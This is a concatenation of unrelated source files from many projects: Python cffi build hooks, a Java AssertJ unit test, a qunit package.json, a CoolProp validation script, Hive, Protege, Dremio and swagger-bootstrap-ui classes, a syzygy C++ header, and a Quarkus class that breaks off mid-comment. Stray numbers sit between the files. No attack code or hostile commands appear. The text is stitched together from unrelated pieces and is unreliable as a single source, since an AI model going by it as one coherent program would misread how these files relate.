import os try: basestring except NameError: # Python 3.x basestring = str def error(msg): from distutils.errors import DistutilsSetupError raise DistutilsSetupError(msg) def execfile(filename, glob): # We use execfile() (here rewritten for Python 3) instead of # __import__() to load the build script. The problem with # a normal import is that in some packages, the intermediate # __init__.py files may already try to import the file that # we are generating. with open(filename) as f: src = f.read() src += '\n' # Python 2.6 compatibility code = compile(src, filename, 'exec') exec(code, glob, glob) def add_cffi_module(dist, mod_spec): from cffi.api import FFI if not isinstance(mod_spec, basestring): error("argument to 'cffi_modules=...' must be a str or a list of str," " not %r" % (type(mod_spec).__name__,)) mod_spec = str(mod_spec) try: build_file_name, ffi_var_name = mod_spec.split(':') except ValueError: error("%r must be of the form 'path/build.py:ffi_variable'" % (mod_spec,)) if not os.path.exists(build_file_name): ext = '' rewritten = build_file_name.replace('.', '/') + '.py' if os.path.exists(rewritten): ext = ' (rewrite cffi_modules to [%r])' % ( rewritten + ':' + ffi_var_name,) error("%r does not name an existing file%s" % (build_file_name, ext)) mod_vars = {'__name__': '__cffi__', '__file__': build_file_name} execfile(build_file_name, mod_vars) try: ffi = mod_vars[ffi_var_name] except KeyError: error("%r: object %r not found in module" % (mod_spec, ffi_var_name)) if not isinstance(ffi, FFI): ffi = ffi() # maybe it's a function instead of directly an ffi if not isinstance(ffi, FFI): error("%r is not an FFI instance (got %r)" % (mod_spec, type(ffi).__name__)) if not hasattr(ffi, '_assigned_source'): error("%r: the set_source() method was not called" % (mod_spec,)) module_name, source, source_extension, kwds = ffi._assigned_source if ffi._windows_unicode: kwds = kwds.copy() ffi._apply_windows_unicode(kwds) if source is None: _add_py_module(dist, ffi, module_name) else: _add_c_module(dist, ffi, module_name, source, source_extension, kwds) def _add_c_module(dist, ffi, module_name, source, source_extension, kwds): from distutils.core import Extension from distutils.command.build_ext import build_ext from distutils.dir_util import mkpath from distutils import log from cffi import recompiler allsources = ['$PLACEHOLDER'] allsources.extend(kwds.pop('sources', [])) ext = Extension(name=module_name, sources=allsources, **kwds) def make_mod(tmpdir, pre_run=None): c_file = os.path.join(tmpdir, module_name + source_extension) log.info("generating cffi module %r" % c_file) mkpath(tmpdir) # a setuptools-only, API-only hook: called with the "ext" and "ffi" # arguments just before we turn the ffi into C code. To use it, # subclass the 'distutils.command.build_ext.build_ext' class and # add a method 'def pre_run(self, ext, ffi)'. if pre_run is not None: pre_run(ext, ffi) updated = recompiler.make_c_source(ffi, module_name, source, c_file) if not updated: log.info("already up-to-date") return c_file if dist.ext_modules is None: dist.ext_modules = [] dist.ext_modules.append(ext) base_class = dist.cmdclass.get('build_ext', build_ext) class build_ext_make_mod(base_class): def run(self): if ext.sources[0] == '$PLACEHOLDER': pre_run = getattr(self, 'pre_run', None) ext.sources[0] = make_mod(self.build_temp, pre_run) base_class.run(self) dist.cmdclass['build_ext'] = build_ext_make_mod # NB. multiple runs here will create multiple 'build_ext_make_mod' # classes. Even in this case the 'build_ext' command should be # run once; but just in case, the logic above does nothing if # called again. def _add_py_module(dist, ffi, module_name): from distutils.dir_util import mkpath from distutils.command.build_py import build_py from distutils.command.build_ext import build_ext from distutils import log from cffi import recompiler def generate_mod(py_file): log.info("generating cffi module %r" % py_file) mkpath(os.path.dirname(py_file)) updated = recompiler.make_py_source(ffi, module_name, py_file) if not updated: log.info("already up-to-date") base_class = dist.cmdclass.get('build_py', build_py) class build_py_make_mod(base_class): def run(self): base_class.run(self) module_path = module_name.split('.') module_path[-1] += '.py' generate_mod(os.path.join(self.build_lib, *module_path)) dist.cmdclass['build_py'] = build_py_make_mod # the following is only for "build_ext -i" base_class_2 = dist.cmdclass.get('build_ext', build_ext) class build_ext_make_mod(base_class_2): def run(self): base_class_2.run(self) if self.inplace: # from get_ext_fullpath() in distutils/command/build_ext.py module_path = module_name.split('.') package = '.'.join(module_path[:-1]) build_py = self.get_finalized_command('build_py') package_dir = build_py.get_package_dir(package) file_name = module_path[-1] + '.py' generate_mod(os.path.join(package_dir, file_name)) dist.cmdclass['build_ext'] = build_ext_make_mod def cffi_modules(dist, attr, value): assert attr == 'cffi_modules' if isinstance(value, basestring): value = [value] for cffi_module in value: add_cffi_module(dist, cffi_module)
2,763
363
/* * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on * an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the * specific language governing permissions and limitations under the License. * * Copyright 2012-2021 the original author or authors. */ package org.assertj.core.api.junit.jupiter; import static org.assertj.core.api.Assertions.assertThat; import static org.assertj.core.api.Assertions.catchThrowable; import static org.mockito.BDDMockito.given; import static org.mockito.Mockito.mock; import java.lang.reflect.Executable; import java.lang.reflect.Parameter; import org.assertj.core.api.AbstractSoftAssertions; import org.assertj.core.api.BDDSoftAssertions; import org.assertj.core.api.SoftAssertions; import org.assertj.core.api.SoftAssertionsProvider; import org.junit.jupiter.api.BeforeEach; import org.junit.jupiter.api.DisplayName; import org.junit.jupiter.api.Test; import org.junit.jupiter.api.extension.ExtensionContext; import org.junit.jupiter.api.extension.ParameterContext; import org.junit.jupiter.api.extension.ParameterResolutionException; /** * Unit tests for {@link SoftAssertionsExtension}. * * @author <NAME> * @since 3.13 * @see SoftAssertionsExtensionIntegrationTest * @see BDDSoftAssertionsExtensionIntegrationTest */ @DisplayName("JUnit Jupiter Soft Assertions extension") class SoftAssertionsExtensionUnitTest { private final SoftAssertionsExtension extension = new SoftAssertionsExtension(); private final ParameterContext parameterContext = mock(ParameterContext.class); private final ExtensionContext extensionContext = mock(ExtensionContext.class); @Test void supports_soft_assertions() throws Exception { // GIVEN Executable executable = MyTests.class.getMethod("softAssertions", SoftAssertions.class); Parameter parameter = executable.getParameters()[0]; given(parameterContext.getParameter()).willReturn(parameter); given(parameterContext.getDeclaringExecutable()).willReturn(executable); // WHEN boolean supportsParameter = extension.supportsParameter(parameterContext, extensionContext); // THEN assertThat(supportsParameter).isTrue(); } @Test void supports_bdd_soft_assertions() throws Exception { // GIVEN Executable executable = MyTests.class.getMethod("bddSoftAssertions", BDDSoftAssertions.class); Parameter parameter = executable.getParameters()[0]; given(parameterContext.getParameter()).willReturn(parameter); given(parameterContext.getDeclaringExecutable()).willReturn(executable); // WHEN boolean supportsParameter = extension.supportsParameter(parameterContext, extensionContext); // THEN assertThat(supportsParameter).isTrue(); } @Test void supports_custom_soft_assertions() throws Exception { // GIVEN Executable executable = MyTests.class.getMethod("customSoftAssertions", MySoftAssertions.class); Parameter parameter = executable.getParameters()[0]; given(parameterContext.getParameter()).willReturn(parameter); given(parameterContext.getDeclaringExecutable()).willReturn(executable); // WHEN boolean supportsParameter = extension.supportsParameter(parameterContext, extensionContext); // THEN assertThat(supportsParameter).isTrue(); } @Test void does_not_support_string() throws Exception { // GIVEN Executable executable = MyTests.class.getMethod("string", String.class); Parameter parameter = executable.getParameters()[0]; given(parameterContext.getParameter()).willReturn(parameter); given(parameterContext.getDeclaringExecutable()).willReturn(executable); // WHEN boolean supportsParameter = extension.supportsParameter(parameterContext, extensionContext); // THEN assertThat(supportsParameter).isFalse(); } @Test void does_not_support_abstract_soft_assertions() throws Exception { // GIVEN Executable executable = MyTests.class.getMethod("abstractCustomSoftAssertions", MyAbstractSoftAssertions.class); Parameter parameter = executable.getParameters()[0]; given(parameterContext.getParameter()).willReturn(parameter); given(parameterContext.getDeclaringExecutable()).willReturn(executable); // WHEN Throwable exception = catchThrowable(() -> extension.supportsParameter(parameterContext, extensionContext)); // THEN assertThat(exception).isInstanceOf(ParameterResolutionException.class) .hasMessageStartingWith("Configuration error: the resolved SoftAssertionsProvider implementation [%s] is abstract and cannot be instantiated", executable); } @Test void does_not_support_soft_assertions_with_no_default_constructor() throws Exception { // GIVEN Executable executable = MyTests.class.getMethod("noDefaultConstructorCustomSoftAssertions", MyNoDefaultConstructorSoftAssertions.class); Parameter parameter = executable.getParameters()[0]; given(parameterContext.getParameter()).willReturn(parameter); given(parameterContext.getDeclaringExecutable()).willReturn(executable); // WHEN Throwable exception = catchThrowable(() -> extension.supportsParameter(parameterContext, extensionContext)); // THEN assertThat(exception).isInstanceOf(ParameterResolutionException.class) .hasMessageStartingWith("Configuration error: the resolved SoftAssertionsProvider implementation [%s] has no default constructor and cannot be instantiated", executable); } @Test void does_not_support_constructor() throws Exception { // GIVEN Executable executable = MyTests.class.getDeclaredConstructor(SoftAssertions.class); Parameter parameter = executable.getParameters()[0]; given(parameterContext.getParameter()).willReturn(parameter); given(parameterContext.getDeclaringExecutable()).willReturn(executable); // WHEN Throwable exception = catchThrowable(() -> extension.supportsParameter(parameterContext, extensionContext)); // THEN assertThat(exception).isInstanceOf(ParameterResolutionException.class) .hasMessageStartingWith("Configuration error: cannot resolve SoftAssertionsProvider instances for"); } @Test void does_not_support_lifecycle_method() throws Exception { // GIVEN Executable executable = MyTests.class.getMethod("beforeEach", SoftAssertions.class); Parameter parameter = executable.getParameters()[0]; given(parameterContext.getParameter()).willReturn(parameter); given(parameterContext.getDeclaringExecutable()).willReturn(executable); // WHEN Throwable exception = catchThrowable(() -> extension.supportsParameter(parameterContext, extensionContext)); // THEN assertThat(exception).isInstanceOf(ParameterResolutionException.class) .hasMessageStartingWith("Configuration error: cannot resolve SoftAssertionsProvider instances for") .hasMessageContaining("beforeEach"); } private static abstract class MyAbstractSoftAssertions implements SoftAssertionsProvider { } private static class MyNoDefaultConstructorSoftAssertions extends AbstractSoftAssertions { @SuppressWarnings("unused") public MyNoDefaultConstructorSoftAssertions(String arg) {} } private static class MySoftAssertions extends AbstractSoftAssertions { } // ------------------------------------------------------------------------- @SuppressWarnings("unused") private static class MyTests { public MyTests(SoftAssertions softly) {} @BeforeEach public void beforeEach(SoftAssertions softly) {} @Test public void softAssertions(SoftAssertions softly) {} @Test public void bddSoftAssertions(BDDSoftAssertions softly) {} @Test public void customSoftAssertions(MySoftAssertions softly) {} @Test public void abstractCustomSoftAssertions(MyAbstractSoftAssertions softly) {} @Test public void noDefaultConstructorCustomSoftAssertions(MyNoDefaultConstructorSoftAssertions softly) {} @Test public void string(String text) {} } }
2,686
5,964
<reponame>FourFiftyNine/fourfiftynine.com<filename>public/javascript/libs/history.js/vendor/qunit/package.json { "name": "qunit", "author": { "name": "<NAME>", "email": "<EMAIL>", "url": "http://ejohn.org/" }, "maintainer": { "name": "<NAME>", "email": "<EMAIL>", "url": "http://bassistance.de/" }, "url": "http://docs.jquery.com/QUnit", "license": { "name": "MIT", "url": "http://www.opensource.org/licenses/mit-license.php" }, "description": "An easy-to-use JavaScript Unit Testing framework.", "keywords": [ "testing", "unit", "jquery" ], "lib": "qunit" }
248
965
void ProcessImages(const wstring& directory) { }
14
520
<filename>Web/fluid_properties/Validation/NelsonValidation.py from CoolProp.HumidAirProp import HAProps print("Validation against <NAME> and <NAME>,\"Formulation for High-Temperature Properties for Moist Air\", HVAC&R Research v.8 #3, 2002") print("Note: More accurate formulation employed than in Nelson. Just for sanity checking") print("Yields a negative relative humidity for Tdb=5C,Twb=-3C, point omitted") tdb = [5, 5, 5, 25, 25, 25, 25, 50, 50, 50, 50, 50, 50, 50] twb = [5, 2, -1, 25, 20, 15, 10, 50, 40, 30, 25, 22, 20, 19] print(" ") print("Table 6: Adiabatic Saturation") print("P=101325 Pa, Altitude = 0 m") print("========================================================================") print("{Tdb:10s}{Twb:10s}{Tdp:10s}{R:10s}{W:10s}{h:10s}{v:10s}".format(W='W', Twb='Twb', Tdp='Tdp', Tdb='Tdb', v='v', h='h', s='s', R='RH')) print("{Tdb:10s}{Twb:10s}{Tdp:10s}{R:10s}{W:10s}{h:10s}{v:10s}".format(W='-', Twb='C', Tdp='C', Tdb='C', v='m^3/kg_da', h='kJ/kg_da', s='kJ/kg_da/K', R='%')) print("------------------------------------------------------------------------") for (tdb_, twb_) in zip(tdb, twb): h = HAProps('H', 'T', tdb_ + 273.13, 'Twb', twb_ + 273.15, 'P', 101.325) tdp = HAProps('Tdp', 'T', tdb_ + 273.13, 'Twb', twb_ + 273.15, 'P', 101.325) - 273.15 W = HAProps('W', 'T', tdb_ + 273.13, 'Twb', twb_ + 273.15, 'P', 101.325) R = HAProps('R', 'T', tdb_ + 273.13, 'Twb', twb_ + 273.15, 'P', 101.325) * 100 v = HAProps('V', 'T', tdb_ + 273.13, 'Twb', twb_ + 273.15, 'P', 101.325) s = 0 print("{Tdb:10.2f}{Twb:10.2f}{Tdp:10.2f}{R:10.1f}{W:10.5f}{h:10.2f}{v:10.3f}".format(W=W, Twb=twb_, Tdp=tdp, Tdb=tdb_, v=v, h=h, s=s, R=R)) print("------------------------------------------------------------------------") print(" ") print("Table 7: Adiabatic Saturation") print("P=84,556 Pa, Altitude = 1500 m") print("========================================================================") print("{Tdb:10s}{Twb:10s}{Tdp:10s}{R:10s}{W:10s}{h:10s}{v:10s}".format(W='W', Twb='Twb', Tdp='Tdp', Tdb='Tdb', v='v', h='h', s='s', R='RH')) print("{Tdb:10s}{Twb:10s}{Tdp:10s}{R:10s}{W:10s}{h:10s}{v:10s}".format(W='-', Twb='C', Tdp='C', Tdb='C', v='m^3/kg_da', h='kJ/kg_da', s='kJ/kg_da/K', R='%')) print("------------------------------------------------------------------------") for (tdb_, twb_) in zip(tdb, twb): h = HAProps('H', 'T', tdb_ + 273.13, 'Twb', twb_ + 273.15, 'P', 84.556) tdp = HAProps('Tdp', 'T', tdb_ + 273.13, 'Twb', twb_ + 273.15, 'P', 84.556) - 273.15 W = HAProps('W', 'T', tdb_ + 273.13, 'Twb', twb_ + 273.15, 'P', 84.556) R = HAProps('R', 'T', tdb_ + 273.13, 'Twb', twb_ + 273.15, 'P', 84.556) * 100 v = HAProps('V', 'T', tdb_ + 273.13, 'Twb', twb_ + 273.15, 'P', 84.556) s = 0 print("{Tdb:10.2f}{Twb:10.2f}{Tdp:10.2f}{R:10.1f}{W:10.5f}{h:10.2f}{v:10.3f}".format(W=W, Twb=twb_, Tdp=tdp, Tdb=tdb_, v=v, h=h, s=s, R=R)) print("------------------------------------------------------------------------")
1,349
4,140
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.hadoop.hive.metastore.model; public class MNotificationLog { private long eventId; // This is not the datanucleus id, but the id assigned by the sequence private int eventTime; private String eventType; private String catalogName; private String dbName; private String tableName; private String message; private String messageFormat; public MNotificationLog() { } public MNotificationLog(int eventId, String eventType, String catName, String dbName, String tableName, String message) { this.eventId = eventId; this.eventType = eventType; this.catalogName = catName; this.dbName = dbName; this.tableName = tableName; this.message = message; } public void setEventId(long eventId) { this.eventId = eventId; } public long getEventId() { return eventId; } public int getEventTime() { return eventTime; } public void setEventTime(int eventTime) { this.eventTime = eventTime; } public String getEventType() { return eventType; } public void setEventType(String eventType) { this.eventType = eventType; } public String getDbName() { return dbName; } public void setDbName(String dbName) { this.dbName = dbName; } public String getCatalogName() { return catalogName; } public void setCatalogName(String catName) { this.catalogName = catName; } public String getTableName() { return tableName; } public void setTableName(String tableName) { this.tableName = tableName; } public String getMessage() { return message; } public void setMessage(String message) { this.message = message; } public String getMessageFormat() { return messageFormat; } public void setMessageFormat(String messageFormat) { this.messageFormat = messageFormat; } }
821
746
<filename>protege-editor-core/src/main/java/org/protege/editor/core/ui/action/ToolBarActionPluginJPFImpl.java package org.protege.editor.core.ui.action; import org.eclipse.core.runtime.IExtension; import org.protege.editor.core.editorkit.EditorKit; import javax.swing.*; /** * Author: <NAME><br> * The University Of Manchester<br> * Medical Informatics Group<br> * Date: Mar 28, 2006<br><br> * <EMAIL><br> * www.cs.man.ac.uk/~horridgm<br><br> */ public class ToolBarActionPluginJPFImpl extends ProtegeActionPluginJPFImpl implements ToolBarActionPlugin { public static final String EXTENSION_POINT_ID = "ToolBarAction"; private static final String GROUP_PARAM = "group"; public static final String GROUP_INDEX_PARAM = "groupIndex"; private static final String DEFAULT_GROUP = "Z"; private static final String DEFAULT_GROUP_INDEX = "Z"; public ToolBarActionPluginJPFImpl(EditorKit editorKit, IExtension extension) { super(editorKit, extension); } public String getGroup() { return getPluginProperty(GROUP_PARAM, DEFAULT_GROUP); } public String getGroupIndex() { return getPluginProperty(GROUP_PARAM, DEFAULT_GROUP_INDEX); } /** * Creates an instance of the plugin. It is expected that * this instance will be "setup", but the instance's * initialise method will not have been called in the instantiation * process. */ public ProtegeAction newInstance() throws ClassNotFoundException, IllegalAccessException, InstantiationException { ProtegeAction menuAction = super.newInstance(); menuAction.putValue(AbstractAction.NAME, getName()); menuAction.putValue(AbstractAction.SHORT_DESCRIPTION, getToolTipText()); menuAction.setEditorKit(getEditorKit()); return menuAction; } }
630
1,085
/* * Copyright (C) 2017-2019 Dremio Corporation * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.dremio.datastore; import com.dremio.datastore.RemoteDataStoreProtobuf.PutRequestIndexKey; import com.dremio.datastore.RemoteDataStoreProtobuf.SearchRequest; import com.dremio.datastore.api.LegacyIndexedStore.LegacyFindByCondition; import com.dremio.datastore.indexed.IndexKey; /** * Utilities related to remote invocation of datastore. */ public final class RemoteDataStoreUtils { /** * Converts a {@link SearchRequest} to a {@link LegacyFindByCondition}. * * @param searchRequest search request * @return find by condition */ public static LegacyFindByCondition getConditionFromRequest(SearchRequest searchRequest) { final LegacyFindByCondition findByCondition = new LegacyFindByCondition(); if (searchRequest.hasLimit()) { findByCondition.setLimit(searchRequest.getLimit()); } if (searchRequest.hasOffset()) { findByCondition.setOffset(searchRequest.getOffset()); } if (searchRequest.hasPageSize()) { findByCondition.setPageSize(searchRequest.getPageSize()); } if (searchRequest.getSortCount() != 0) { findByCondition.addSortings(searchRequest.getSortList()); } if (searchRequest.hasQuery()) { findByCondition.setCondition(searchRequest.getQuery()); } return findByCondition; } /** * Converts a {@link LegacyFindByCondition} to a {@link SearchRequest}. * * @param storeId store id * @param condition find by condition * @return search request */ public static SearchRequest getRequestFromCondition(String storeId, LegacyFindByCondition condition) { final SearchRequest.Builder builder = SearchRequest.newBuilder(); builder.setStoreId(storeId); if (condition.getCondition() != null) { builder.setQuery(condition.getCondition()); } builder.setLimit(condition.getLimit()); builder.setOffset(condition.getOffset()); builder.setPageSize(condition.getPageSize()); if (!condition.getSort().isEmpty()) { builder.addAllSort(condition.getSort()); } return builder.build(); } /** * Converts an {@link IndexKey} to {@link PutRequestIndexKey} for use with remote datastore * PutRequests in indexed stores, for use with DocumentWriters such as * {@link com.dremio.datastore.indexed.SimpleDocumentWriter}. * * @param indexKey The index key to convert. * @return The PutRequestIndexKey that can be attached to PutRequest api calls. */ public static PutRequestIndexKey toPutRequestIndexKey(IndexKey indexKey) { PutRequestIndexKey.Builder builder = PutRequestIndexKey.newBuilder() .setShortName(indexKey.getShortName()) .setIndexFieldName(indexKey.getIndexFieldName()) .setStored(indexKey.isSorted()) .setCanContainMultipleValues(indexKey.canContainMultipleValues()); SearchTypes.SearchFieldSorting.FieldType sortedValueType = indexKey.getSortedValueType(); if (null != sortedValueType) { builder.setSortingValueType(sortedValueType); } Class<?> valueType = indexKey.getValueType(); if (valueType == String.class) { // bytes are labelled with valuetype of String in SimpleDocumentConverter builder.setValueType(RemoteDataStoreProtobuf.PutRequestIndexKeyValueType.STRING); } else if (valueType == Long.class) { builder.setValueType(RemoteDataStoreProtobuf.PutRequestIndexKeyValueType.LONG); } else if (valueType == Integer.class) { builder.setValueType(RemoteDataStoreProtobuf.PutRequestIndexKeyValueType.INTEGER); } else if (valueType == Double.class) { builder.setValueType(RemoteDataStoreProtobuf.PutRequestIndexKeyValueType.DOUBLE); } else { throw new IllegalStateException(String.format("Unknown index key value type: %s", valueType.getName())); } return builder.build(); } /** * Converts a {@link PutRequestIndexKey} to an {@link IndexKey} for use with DocumentWriters. * * @param requestIndexKey The PutRequestIndexKey which was attached to a PutRequest api call. * @return The index key to be used with DocumentWriters such as * {@link com.dremio.datastore.indexed.SimpleDocumentWriter}. */ public static IndexKey toIndexKey(PutRequestIndexKey requestIndexKey) { final Class<?> valueType; switch (requestIndexKey.getValueType()) { case INTEGER: valueType = Integer.class; break; case DOUBLE: valueType = Double.class; break; case LONG: valueType = Long.class; break; case STRING: valueType = String.class; break; default: throw new IllegalStateException(String.format("Unknown index key type: %s", requestIndexKey.getValueType().name())); } IndexKey.Builder builder = IndexKey.newBuilder(requestIndexKey.getShortName(), requestIndexKey.getIndexFieldName(), valueType) .setStored(requestIndexKey.getStored()) .setCanContainMultipleValues(requestIndexKey.getCanContainMultipleValues()); if (requestIndexKey.hasSortingValueType()) { switch (requestIndexKey.getSortingValueType()) { case STRING: builder.setSortedValueType(SearchTypes.SearchFieldSorting.FieldType.STRING); break; case LONG: builder.setSortedValueType(SearchTypes.SearchFieldSorting.FieldType.LONG); break; case DOUBLE: builder.setSortedValueType(SearchTypes.SearchFieldSorting.FieldType.DOUBLE); break; case INTEGER: builder.setSortedValueType(SearchTypes.SearchFieldSorting.FieldType.INTEGER); break; default: throw new IllegalStateException(String.format("Unknown index key sorting value type: %s", requestIndexKey.getSortingValueType().name())); } } return builder.build(); } private RemoteDataStoreUtils() { } }
2,187
348
{"nom":"Millonfosse","circ":"20ème circonscription","dpt":"Nord","inscrits":570,"abs":305,"votants":265,"blancs":17,"nuls":2,"exp":246,"res":[{"nuance":"COM","nom":"<NAME>","voix":156},{"nuance":"FN","nom":"<NAME>","voix":90}]}
90
343
<filename>syzygy/block_graph/basic_block_test_util.h // Copyright 2012 Google Inc. All Rights Reserved. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. #ifndef SYZYGY_BLOCK_GRAPH_BASIC_BLOCK_TEST_UTIL_H_ #define SYZYGY_BLOCK_GRAPH_BASIC_BLOCK_TEST_UTIL_H_ #include "gtest/gtest.h" #include "syzygy/block_graph/basic_block_decomposer.h" #include "syzygy/block_graph/basic_block_subgraph.h" #include "syzygy/block_graph/unittest_util.h" extern "C" { // Functions and labels exposed from our .asm test stub. extern int assembly_func(); extern int unreachable_label(); extern int interrupt_label(); extern int assembly_func_end(); extern int case_0(); extern int case_1(); extern int case_default(); extern int jump_table(); extern int case_table(); // Functions invoked or referred by the .asm test stub. These are defined in // basic_block_test_util.cc. extern int func1(); extern int func2(); } // extern "C" namespace testing { // A utility class for generating test data built around the function in // basic_block_assembly_func.asm. When assembly_func_ is decomposed as a basic // block subgraph the layout is as follows: // // BB0: offset 0, code, assembly_func, 4 instructions, 0 successors // BB1: offset 23, code/padding (unreachable code) // BB2: offset 24, code, case_0, 2 instructions, 1 successor // BB3: offset 31, code, sub eax to jnz, 1 instruction, 2 successors // BB4: offset 36, code, ret, 1 instruction, 0 successors // BB5: offset 37, code, case_1, 1 instruction, 1 successor // BB6: offset 42, code, case_default, 2 instructions, 0 successors // BB7: offset 49, code/padding, interrupt_label, 3 instruction, 0 successors // BB8: offset 50, data, jump_table, 12 bytes // BB9: offset 62, data, case_table, 256 bytes class BasicBlockTest : public ::testing::Test { public: typedef core::RelativeAddress RelativeAddress; typedef block_graph::BlockGraph BlockGraph; typedef block_graph::BasicBlockDecomposer BasicBlockDecomposer; typedef block_graph::BasicBlockSubGraph BasicBlockSubGraph; typedef BasicBlockSubGraph::BasicBlock BasicBlock; typedef BasicBlockSubGraph::BlockDescription BlockDescription; typedef BlockGraph::Block Block; typedef BlockGraph::Reference Reference; typedef BlockGraph::Section Section; // The number and type of basic blocks. static const size_t kNumCodeBasicBlocks = 8; static const size_t kNumDataBasicBlocks = 2; static const size_t kNumEndBasicBlocks = 1; static const size_t kNumCodePaddingBasicBlocks = 2; static const size_t kNumDataPaddingBasicBlocks = 0; static const size_t kNumBasicBlocks = kNumCodeBasicBlocks + kNumDataBasicBlocks + kNumEndBasicBlocks; BasicBlockTest(); // Initializes block_graph, assembly_func, func1, func2 and data. Meant to be // wrapped in ASSERT_NO_FATAL_FAILURE. void InitBlockGraph(); // Initializes subgraph, bbs and bds. Meant to be wrapped in // ASSERT_NO_FATAL_FAILURE. // @pre InitBlockGraph must have been called successfully. void InitBasicBlockSubGraph(); // Initializes block_graph_, text_section_, func1_, and func2_. Leaves // data_section_, assembly_func_ and data_ NULL. func2_ contains a function // with a debug-end label past the end of the block, and internally it calls // func1_. void InitBasicBlockSubGraphWithLabelPastEnd(); // Initialized by InitBlockGraph. // @{ // Start address of the assembly function. RelativeAddress start_addr_; testing::DummyTransformPolicy policy_; BlockGraph block_graph_; Section* text_section_; Section* data_section_; Block* assembly_func_; Block* func1_; Block* func2_; Block* data_; // @} // Initialized by InitBasicBlockSubGraph and // InitBasicBlockSubGraphWithLabelPastEnd. // @{ BasicBlockSubGraph subgraph_; std::vector<BasicBlock*> bbs_; std::vector<BlockDescription*> bds_; // @} }; } // namespace testing #endif // SYZYGY_BLOCK_GRAPH_BASIC_BLOCK_TEST_UTIL_H_
1,392
2,487
<reponame>gitter-badger/swagger-bootstrap-ui /* * Copyright (C) 2018 Zhejiang xiaominfo Technology CO.,LTD. * All rights reserved. * Official Web Site: http://www.xiaominfo.com. * Developer Web Site: http://open.xiaominfo.com. */ package com.github.xiaoymin.swaggerbootstrapui.filter; import com.github.xiaoymin.swaggerbootstrapui.conf.Consts; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import java.util.ArrayList; import java.util.Base64; import java.util.List; import java.util.regex.Pattern; /*** * * @since:swagger-bootstrap-ui 1.9.0 * @author <a href="mailto:<EMAIL>"><EMAIL></a> * 2019/02/02 19:57 */ public class BasicFilter implements Consts{ private Logger logger= LoggerFactory.getLogger(BasicFilter.class); protected List<Pattern> urlFilters=null; public BasicFilter(){ urlFilters=new ArrayList<>(); urlFilters.add(Pattern.compile(".*?/doc\\.html.*",Pattern.CASE_INSENSITIVE)); urlFilters.add(Pattern.compile(".*?/v2/api-docs.*",Pattern.CASE_INSENSITIVE)); urlFilters.add(Pattern.compile(".*?/v2/api-docs-ext.*",Pattern.CASE_INSENSITIVE)); urlFilters.add(Pattern.compile(".*?/swagger-resources.*",Pattern.CASE_INSENSITIVE)); urlFilters.add(Pattern.compile(".*?/swagger-ui\\.html.*",Pattern.CASE_INSENSITIVE)); urlFilters.add(Pattern.compile(".*?/swagger-resources/configuration/ui.*",Pattern.CASE_INSENSITIVE)); urlFilters.add(Pattern.compile(".*?/swagger-resources/configuration/security.*",Pattern.CASE_INSENSITIVE)); } protected boolean match(String uri){ boolean match=false; if (uri!=null){ for (Pattern pattern:getUrlFilters()){ if (pattern.matcher(uri).matches()){ match=true; break; } } } return match; } protected String decodeBase64(String source){ String decodeStr=null; if (source!=null){ //BASE64Decoder decoder=new BASE64Decoder(); try { //byte[] bytes=decoder.decodeBuffer(source); byte[] bytes=Base64.getDecoder().decode(source); decodeStr=new String(bytes); } catch (Exception e) { logger.error(e.getMessage(),e); } } return decodeStr; } public List<Pattern> getUrlFilters() { return urlFilters; } }
1,093
10,225
package io.quarkus.vertx.web; import java.util.Objects; import io.quarkus.vertx.web.runtime.JsonArrayMulti; import io.quarkus.vertx.web.runtime.NdjsonMulti; import io.quarkus.vertx.web.runtime.SSEMulti; import io.smallrye.mutiny.Multi; /** * Provides utility methods, mainly to handle {@code text/event-stream} responses. */ public class ReactiveRoutes { private ReactiveRoutes() { // Avoid direct instantiation. } /** * Indicates the the given stream should be written as server-sent-event in the response. * Returning a {@code multi} wrapped using this method produces a {@code text/event-stream} response. Each item * is written as an event in the response. The response automatically enables the chunked encoding and set the * content type. * <p> * If the item is a String, the {@code data} part of the event is this string. An {@code id} is automatically * generated. * If the item is a Buffer, the {@code data} part of the event is this buffer. An {@code id} is automatically * generated. * If the item is an Object, the {@code data} part of the event is the JSON representation of this object. An * {@code id} is automatically generated. * If the item is an {@link ServerSentEvent}, the {@code data} part of the event is the JSON representation of this * {@link ServerSentEvent#data()}. The {@code id} is computed from {@link ServerSentEvent#id()} (generated if not * implemented). The {@code event} section (ignored in all the other case) is computed from * {@link ServerSentEvent#event()}. * <p> * Example of usage: * * <pre> * &#64;Route(path = "/people") * Multi&lt;Person&gt; people(RoutingContext context) { * return ReactiveRoutes.asEventStream(Multi.createFrom().items( * new Person("superman", 1), * new Person("batman", 2), * new Person("spiderman", 3))); * } * </pre> * * @param multi the multi to be written * @param <T> the type of item, can be string, buffer, object or io.quarkus.vertx.web.ReactiveRoutes.ServerSentEvent * @return the wrapped multi */ public static <T> Multi<T> asEventStream(Multi<T> multi) { return new SSEMulti<>(Objects.requireNonNull(multi, "The passed multi must not be `null`")); } /** * Indicates the the given stream should be written as a Json stream in the response. * Returning a {@code multi} wrapped using this method produces a {@code application/x-ndjson} response. Each item * is written as an serialized json on a 